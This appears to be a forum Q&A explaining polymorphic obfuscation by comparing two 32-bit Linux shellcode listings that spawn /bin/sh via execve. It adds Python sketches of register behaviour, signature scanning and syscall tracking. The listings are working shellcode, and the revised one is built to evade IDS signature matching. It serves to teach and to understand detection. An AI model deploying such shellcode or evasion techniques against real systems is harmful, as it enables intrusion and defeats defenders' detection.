Explaining polymorphic obfuscation using the differences between two asm listings
Here are two asm listings (copied from this forum thread, polymorphic-shellcode):
original asm before obfuscation:
global _start
section .text
_start:
xor eax,eax
push eax
push dword 0x68732f2f ; //sh
push dword 0x6e69622f ; /bin
mov ebx,esp
mov ecx,eax
mov edx,eax
mov al,0xb ; execve()
int 0x80
xor eax,eax
inc eax
int 0x80
revised asm after obfuscation:
global _start
section .text
_start:
xor edx, edx ;line 1
push edx ;line 2
mov eax, 0x563ED8B7 ;line 3
add eax, 0x12345678 ;line 4
push eax ;line 5
mov eax, 0xDEADC0DE ;line 6
sub eax, 0x70445EAF ;line 7
push eax ;line 8
push byte 0xb ;line 9
pop eax ;line 10
mov ecx, edx ;line 11
mov ebx, esp ;line 12
push byte 0x1 ;line 13
pop esi ;line 14
int 0x80 ;line 15
xchg esi, eax ;line 16
int 0x80 ;line 17
It makes four changes:
1. Mask the /bin/sh string by doing arithmetic operations instead of pushing the hex values onto the stack directly.
Q1.1: I understand lines 3 to 8 (in the revised asm). What does line 9 mean? Is it equivalent to "mov al,0xb" in the original asm?
2. Use different registers than the original code where possible.
Q2.1: Do lines 1 and 2 (revised asm), for example, refer to this?
Q2.2: I understand obfuscation as preventing an IDS from matching keywords, so why change registers?
3. Reorder instructions. Don't initialize the registers in the same order before calling execve.
Q3.1: I do not understand this. Please explain it using the two asm listings above.
4. Introduce some unnecessary steps, e.g. push byte 0x1; pop esi; xchg esi,eax instead of popping to eax after the first int 0x80 instruction is executed.
Q4.1: In the original asm, why are there two int 0x80 instructions? I tried deleting the last int 0x80 and it still works.
Q4.2: Is adding unnecessary steps directly related to obfuscation?
Q5: Why "pop eax" in line 10?
Q1.1: I understand lines 3 to 8 (in the revised asm). What does line 9 mean? Is it equivalent to "mov al,0xb" in the original asm?
Lines 9 and 10 do push byte 0xb, pop eax, which is equivalent to mov eax,0x0000000b. The push stores the byte sign-extended to a full 32-bit dword, so after the pop al holds 0xb and the rest of the eax register is zero. So it actually replaces the xor eax,eax / mov al,0xb combination.
push byte 0xb -> sub esp,4 / mov dword [ss:esp],0x0000000b ; memory at SS:ESP = 0x0000000b
pop eax -> mov eax,[ss:esp] / add esp,4 ; ergo eax = 0x0000000b
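To make the difference between the two ways of loading 0xb concrete, here is a minimal Python sketch that models the register as a 32-bit integer. The helper names (sign_extend_imm8, push_byte_pop, mov_low_byte) are made up for illustration; the sketch only mirrors the behaviour described above and is not an emulator.

```python
MASK32 = 0xFFFFFFFF

def sign_extend_imm8(value):
    """Sign-extend an 8-bit immediate to 32 bits, as `push byte imm8` does in 32-bit mode."""
    value &= 0xFF
    return (value | 0xFFFFFF00) if (value & 0x80) else value

def push_byte_pop(imm8):
    """Model `push byte imm8` followed by `pop reg`; returns the register value."""
    stack = []
    stack.append(sign_extend_imm8(imm8))  # push stores a full 32-bit dword
    return stack.pop()                    # pop loads all 32 bits into the register

def mov_low_byte(reg, imm8):
    """Model `mov al, imm8`: only the low 8 bits of the register change."""
    return (reg & 0xFFFFFF00) | (imm8 & 0xFF)

eax_revised = push_byte_pop(0x0B)               # revised listing, lines 9 and 10
eax_original = mov_low_byte(0x00000000, 0x0B)   # original: eax already zeroed by xor
eax_stale = mov_low_byte(0xDEADBEEF, 0x0B)      # mov al alone, without the xor

print(hex(eax_revised), hex(eax_original), hex(eax_stale))
```

The last value shows why the original needs xor eax,eax before mov al,0xb: without it the upper 24 bits keep whatever was there before, whereas push/pop overwrites the whole register.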
Q2.2: I understand obfuscation as preventing an IDS from matching keywords, so why change registers?
Many compilers use registers in a more or less standard manner. An advanced program like IDA Pro (or an IDS) can use this knowledge to decompile the assembly back to readable source code, provided that it can deduce the exact compiler version used to create the program. Mixing up the registers makes it harder for a decompiler to translate the assembly code to higher-level (pseudo) source code. The same goes for an IDS that uses known code snippets to deduce what actions a program performs.
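As a rough illustration of snippet matching, the sketch below runs a naive byte-signature scan over the string-building instructions of both listings. The byte strings are hand-assembled 32-bit encodings of just those instructions, and SIGNATURES and the function names are hypothetical; a real IDS is far more elaborate than a substring search.

```python
import struct

# Hand-assembled encodings of the string-building instructions only.
ORIGINAL = bytes.fromhex(
    "682f2f7368"   # push dword 0x68732f2f
    "682f62696e"   # push dword 0x6e69622f
)
REVISED = bytes.fromhex(
    "b8b7d83e56"   # mov eax, 0x563ED8B7
    "0578563412"   # add eax, 0x12345678
    "50"           # push eax
    "b8dec0adde"   # mov eax, 0xDEADC0DE
    "2daf5e4470"   # sub eax, 0x70445EAF
    "50"           # push eax
)

SIGNATURES = [b"//sh", b"/bin"]  # hypothetical signatures a scanner might look for

def matched_signatures(code):
    """Return the signatures that appear literally in the byte string."""
    return [sig for sig in SIGNATURES if sig in code]

def decoded_string():
    """Redo the arithmetic of lines 3 to 8 and return the bytes as they sit in memory."""
    first = (0x563ED8B7 + 0x12345678) & 0xFFFFFFFF   # pushed first, higher address
    second = (0xDEADC0DE - 0x70445EAF) & 0xFFFFFFFF  # pushed second, lower address
    return struct.pack("<I", second) + struct.pack("<I", first)

print(matched_signatures(ORIGINAL))  # both literals are visible in the original
print(matched_signatures(REVISED))   # nothing matches in the revised bytes
print(decoded_string())              # yet the same string ends up on the stack
```

The scan finds both literals in the original bytes and none in the revised ones, although the arithmetic still produces /bin//sh at run time.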
Reorder instructions. Don't initialize the registers in the same order before calling execve. Q3.1: I do not understand this. Please explain it using the two asm listings above.
If you use system calls, it is relatively easy to deduce what actions an application is performing. Linux (for example) expects the syscall number in eax, and every call takes its parameters in predetermined registers. If an analysis program has difficulty determining the value of eax, it becomes unclear which system call is being executed. Without this knowledge the meaning of the other registers (read: parameters) cannot be known. If you fill unused registers with nonsense values as well, things become even harder to interpret.
The obfuscator does not want you to know it is calling syscall #11 (execve). The only way to do this is to load eax with 0xb in a roundabout manner. If we always load eax last (or first), then it becomes easier to figure out what is going on. If we load eax using two or more instructions, and we put lots of unrelated instructions in between, then it becomes harder to track the final value of eax before the int 0x80 which performs the syscall.
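To show what "tracking the value of eax" means for an analysis tool, here is a small Python sketch that interprets just the handful of instructions used in the revised listing and records eax at every int 0x80. Everything in it (trace_syscalls, the tuple encoding of instructions, the SYSCALL_NAMES table) is an assumption made for this example; esp is not modeled as a real address, and int 0x80 is assumed to leave the registers untouched.

```python
MASK32 = 0xFFFFFFFF
SYSCALL_NAMES = {1: "exit", 11: "execve"}  # Linux i386 syscall numbers

def trace_syscalls(program):
    """Interpret a tiny x86 subset and return eax as seen at each `int`."""
    regs = dict.fromkeys(("eax", "ebx", "ecx", "edx", "esi", "esp"), 0)
    stack = []
    syscalls = []

    def value(operand):
        # Strings name registers, integers are immediates.
        return regs[operand] if isinstance(operand, str) else operand & MASK32

    for op, *args in program:
        if op == "mov":
            regs[args[0]] = value(args[1])
        elif op == "xor":
            regs[args[0]] ^= value(args[1])
        elif op == "add":
            regs[args[0]] = (regs[args[0]] + value(args[1])) & MASK32
        elif op == "sub":
            regs[args[0]] = (regs[args[0]] - value(args[1])) & MASK32
        elif op == "push":
            stack.append(value(args[0]))
        elif op == "pop":
            regs[args[0]] = stack.pop()
        elif op == "xchg":
            a, b = args
            regs[a], regs[b] = regs[b], regs[a]
        elif op == "int":
            syscalls.append(regs["eax"])
        else:
            raise ValueError(f"unsupported instruction: {op}")
    return syscalls

# The revised listing, lines 1 to 17.
REVISED = [
    ("xor", "edx", "edx"), ("push", "edx"),
    ("mov", "eax", 0x563ED8B7), ("add", "eax", 0x12345678), ("push", "eax"),
    ("mov", "eax", 0xDEADC0DE), ("sub", "eax", 0x70445EAF), ("push", "eax"),
    ("push", 0xB), ("pop", "eax"),
    ("mov", "ecx", "edx"), ("mov", "ebx", "esp"),
    ("push", 0x1), ("pop", "esi"),
    ("int", 0x80), ("xchg", "esi", "eax"), ("int", 0x80),
]

numbers = trace_syscalls(REVISED)
print([SYSCALL_NAMES.get(n, "unknown") for n in numbers])
```

Even this toy tracker has to follow the stack and an xchg to recover the two syscall numbers; every extra indirection the obfuscator adds is one more thing a static analysis must model correctly.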
Q4.1: In the original asm, why are there two int 0x80 instructions? I tried deleting the last int 0x80 and it still works. Q4.2: Is adding unnecessary steps directly related to obfuscation?
No, the second int 0x80 is not an unnecessary step. Before it, the code loads 1 into eax (xor eax,eax / inc eax in the original, xchg esi,eax in the revised version). Syscall #1 happens to be sys_exit, which cleanly terminates the program. It only matters when execve fails, because a successful execve replaces the process image and never returns. When injecting the code into a program, the bytes after the inserted snippet are random garbage; we don't want to execute those and must thus exit cleanly. The call to sys_exit achieves this.
If you assemble this snippet as a stand-alone program and execve succeeds, the instructions after the first int 0x80 are never reached. This is why removing the last int 0x80 seems to make no difference.
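One way to check whether code placed after an exec call ever runs is the Python sketch below. It assumes a POSIX system; the CHILD script and its messages are made up for the demonstration. A child interpreter calls os.execv, which wraps the same family of system call, and the parent inspects what the child printed.

```python
import subprocess
import sys

# Script run in a child process: it prints, replaces itself via exec,
# and has one more print that would only run if the exec returned.
CHILD = r'''
import os, sys
print("before exec", flush=True)
os.execv(sys.executable, [sys.executable, "-c", "print('new image')"])
print("after exec")
'''

result = subprocess.run(
    [sys.executable, "-c", CHILD],
    capture_output=True,
    text=True,
)
lines = result.stdout.splitlines()
print(lines)
```

On a system where the exec succeeds, "after exec" never appears in the output, which matches the shellcode case: the trailing exit call is a fallback for the failure path only.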
Q5: Why "pop eax" in line 10?
First a 0xb is pushed, then it is popped into eax, essentially performing a mov eax,0xb.